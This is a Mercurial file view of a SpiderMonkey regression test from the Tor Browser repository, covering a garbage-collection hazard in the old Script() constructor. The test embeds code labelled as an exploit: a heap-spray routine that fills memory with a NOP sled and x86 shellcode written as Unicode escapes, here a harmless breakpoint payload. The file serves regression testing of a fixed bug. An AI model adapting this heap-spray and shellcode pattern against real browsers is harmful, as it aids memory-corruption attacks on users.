The Tor Browser / file revision

js/src/tests/js1_5/extensions/regress-338804-01.js@b8a032363ba2

js/src/tests/js1_5/extensions/regress-338804-01.js

Thu, 22 Jan 2015 13:21:57 +0100

author
Michael Schloh von Bennewitz <michael@schloh.com>
date
Thu, 22 Jan 2015 13:21:57 +0100
branch
TOR_BUG_9701
changeset 15
b8a032363ba2
permissions
-rw-r--r--

Incorporate requested changes from Mozilla in review:
https://bugzilla.mozilla.org/show_bug.cgi?id=1123480#c6

     1 /* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */

     2 /* This Source Code Form is subject to the terms of the Mozilla Public

     3  * License, v. 2.0. If a copy of the MPL was not distributed with this

     4  * file, You can obtain one at http://mozilla.org/MPL/2.0/. */

     5 

     6 //-----------------------------------------------------------------------------

     7 var BUGNUMBER = 338804;

     8 var summary = 'GC hazards in constructor functions';

     9 var actual = 'No Crash';

    10 var expect = 'No Crash';

    11 

    12 printBugNumber(BUGNUMBER);

    13 printStatus (summary);

    14 printStatus ('Uses Intel Assembly');

    15 

    16 // <script>

    17 // SpiderMonkey Script() GC hazard exploit

    18 //

    19 // scale: magic number ;-)

    20 //  BonEcho/2.0a2: 3000

    21 //  Firefox/1.5.0.4: 2000

    22 //

    23 var rooter, scale = 3000;

    24 

    25 /*

    26   if(typeof(setTimeout) != "undefined") {

    27   setTimeout(exploit, 2000);

    28   } else {

    29   exploit();

    30   }

    31 */

    32 

    33 function exploit() {

    34   if (typeof Script == 'undefined')

    35   {

    36     print('Test skipped. Script not defined.');

    37   }

    38   else

    39   {

    40     Script({ toString: fillHeap });

    41     Script({ toString: fillHeap });

    42   }

    43 }

    44 

    45 function createPayload() {

    46   var result = "\u9090", i;

    47   for(i = 0; i < 9; i++) {

    48     result += result;

    49   }

    50   /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */

    51   result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";

    52   return result;

    53 }

    54 

    55 function fillHeap() {

    56   rooter = [];

    57   var payload = createPayload(), block = "", s2 = scale * 2, i;

    58   for(i = 0; i < scale; i++) {

    59     rooter[i] = block = block + payload;

    60   }

    61   for(; i < s2; i++) {

    62     rooter[i] = payload + i;

    63   }

    64   return "";

    65 }

    66 

    67 // </script>

    68  

    69 reportCompare(expect, actual, summary);

Mercurial Repository: The Tor Browser

Europalab SCM Repository Server

mercurial